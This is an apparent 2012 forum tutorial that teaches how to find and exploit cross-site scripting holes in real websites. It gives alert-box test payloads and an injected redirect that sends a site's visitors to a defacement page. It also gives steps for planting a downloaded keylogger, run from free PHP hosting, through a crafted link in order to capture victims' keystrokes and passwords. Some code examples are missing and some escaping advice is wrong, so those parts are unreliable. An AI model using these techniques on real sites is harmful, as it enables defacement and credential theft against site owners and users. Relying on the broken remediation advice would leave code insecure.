Nov 20, 2012

[TUT]Hack websites using XSS[TUT][HQ]


What is XSS?, what can I accomplish with it?

XSS is common in search bars and comment boxes. We can then inject almost any type of scripting language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.


Reason Behind XSS vulnerability?

Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.
Types of XSS

There are three types of XSS. DOM-based, Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

How to test for XSS vulnerabilities?

To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.

**<*script*>alert('XSS');

(Important:Please remove "*" or type the above text on search box without "*")

Now we will see a pop up message "XSS"shown In picture

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

"*>*alert('XSS'); (Important:Please remove '*' or type the above text on search box without '*') Now, we have found out that it is vulnerable.Lets go to next step.

deface/Hacking a webpage with XSS?

Here is the important part that explain defacing website i have methods for both persistent, and non-persistent XSS.

Persistent XSS.

First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before: <*script*>window.location="*http://yourdefacepage.com/index.html";<*/script*> (Important:Please remove '*' or type the above text on search box without '*') Remember, you can always alter the code if it doesn't work. You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.

Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

How to make a cookie logger?

As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website.

To perform this Attack we need three thigs

Xssed Site(That is a xss vulnerable site)

Webhosting sevice (Free) ==> http://www.000webhost.com/

Keylogging Script

First Of all Download the script from the below link

http://sharesend.com/fnfie

Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.

Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com just Change it to your hosting URl.

Now host all these scripts on your web host.

Now find a XSS vulnerable website website and include script link like this:
http://targetwebsite.com/search.php?q="


Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.

If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords.

DOM-based XSS

What is DOM?

DOM is expanded as Document object model that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage.

Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.

Here is a very simple HTML code that accepts and writes user input using JavaScript with the help of DOM.








If you know HTML and Javscript, understanding the above code is a piece of cake.

In the above example, the javascript code gets value from the url parameter "BTSinput" and writes the value in our webpage.

Did you notice ?! The part of the webpage is not written by Server-side script. The client side script modifies the content dynamically based on the input. Everything done with the help of DOM object 'document'.

DOM Based XSS vulnerability:

When a developer writes the content using DOM object without sanitizing the user input , it allow an attacker to run his own code.

In above example, we failed to sanitize the input and simply displayed the whatever value we get from the url.

An attacker with malicious intention can inject a xss vector instead .

As i said earlier, the document.write function simply writes the value of BTSinput parameter in the webpage. So it will write the '' in the webpage without sanitizing. This results in running the script code and displays the alert box.

Patching the DOM Based Cross Site Scripting Vulnerability
Audit all JavaScript code in use by your application to make sure that untrusted data is being escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are dozens of JavaScript functions and properties which must be protected, including some which are rather non-obvious:

The document.write() function
The document.writeln() function
The eval() function, which executes JavaScript code from a string
The execScript() function, which works similarly to eval()
The setInterval(), setTimeout(), and navigate() functions
The .innerHTML property of a DOM element
Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
The event handler properties like .onClick, which take JavaScript code as their values


Any data which is derived from data under the client's control (e.g. request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values.

You can use the JavaScript built-in functions encode() or encodeURI() to handle your escaping. If you write your own escaping functions, be extremely careful. Rather than using a "black list" approach (where you filter dangerous characters and pass everything else through untouched), it is better to use a "white list" approach. A good white list approach is to escape everything by default and allow only alphanumeric characters through.

Download JDB generator